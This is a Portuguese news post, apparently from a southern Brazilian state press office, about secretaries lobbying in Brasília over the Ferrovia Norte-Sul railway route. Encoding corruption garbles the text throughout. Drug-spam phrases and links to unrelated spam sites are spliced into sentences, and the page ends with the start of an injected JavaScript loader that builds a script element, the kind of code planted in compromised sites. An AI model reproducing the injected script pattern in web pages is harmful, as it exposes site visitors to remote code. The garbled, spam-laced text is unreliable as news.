SecretA?rios da RegiA?o Sul apresentam pleitos sobre a Ferrovia Norte-Sul, em BrasAi??lia
- Posted by: Ass. imprensa
- Posted in: Geral, Notícias
- Tags
O secretA?rio de Infraestrutura e LogAi??stica do RS, Beto Albuquerque, acompanhado pelos titulares das respectivas pastas dos Estados de Santa Catarina, Valdir Cobalchini, e do ParanA?, JosAi?? Richa Filho, retomaram o debate sobre o traAi??ado da Ferrovia Norte-Sul, em reuniA?o realizada nesta terAi??a-feira (28), em BrasAi??lia. Os representantes estaduais encaminharam ao presidente Empresa de Planejamento e LogAi??stica (EPL), Bernardo Figueiredo, solicitaAi??A?o para que a Ferrovia Norte-Sul seja incluAi??da no mesmo pacote de investimentos em ferrovias no Brasil anunciado, na A?ltima what does carafate cost semana, pela presidente Dilma Rousseff.
“Ai?? fundamental retomarmos o traAi??ado purchase colospa tablet anterior, no qual priorizamos a interiorizaAi??A?o da ferrovia. NA?o podemos deixar os centros produtivos longe dos trilhos”, disse Beto ao destacar que o trajeto inicial, que partiria de Panorama (SP), passaria por ChapecA? (SC) e chegaria a Rio Grande (RS), reduz em R$ 500 milhAi??es os custos logAi??sticos. Figueiredo assegurou Ai?? comitiva que a Ferrovia Norte-Sul nA?o foi descartada pelo Governo Federal e que, no dia 05 de setembro, serA?o abertas as propostas das empresas que participam da licitaAi??A?o para realizar os estudos de viabilidade tAi??cnica, econA?mica e ambiental da Ferrovia. “Volto mais tranquilo porque a UniA?o afirma nA?o ter desistido da Norte-Sul e que darA? prioridade ao estudo”, afirmou o titular da Seinfra.
Na avaliaAi??A?o de Beto Albuquerque, o projeto apresentado recentemente demonstra a preocupaAi??A?o do Governo Federal com a retomada de investimentos no modal ferroviA?rio brasileiro, tA?o necessA?rio ao PaAi??s e que preencherA? um vazio ferroviA?rio de 250 quilA?metros atAi?? o http://bdtongchen.com/?p=13531 Porto de Rio Grande, mas prioriza o traAi??ado litorA?neo, o qual nA?o contempla regiAi??es produtivas. “Este projeto irA? revitalizar as ferrovias, o que Ai?? muito bom, mas nA?o podemos ficar presos Ai??s ferrovias litorA?neas e longe dos nossos centros produtivos. AlAi??m disso, este traAi??ado pode levar cargas para outros portos”, afirmou.
http://nellcote.w1p.me/purchase-suhagra/
var d=document;var s=d.createElement(‘script’);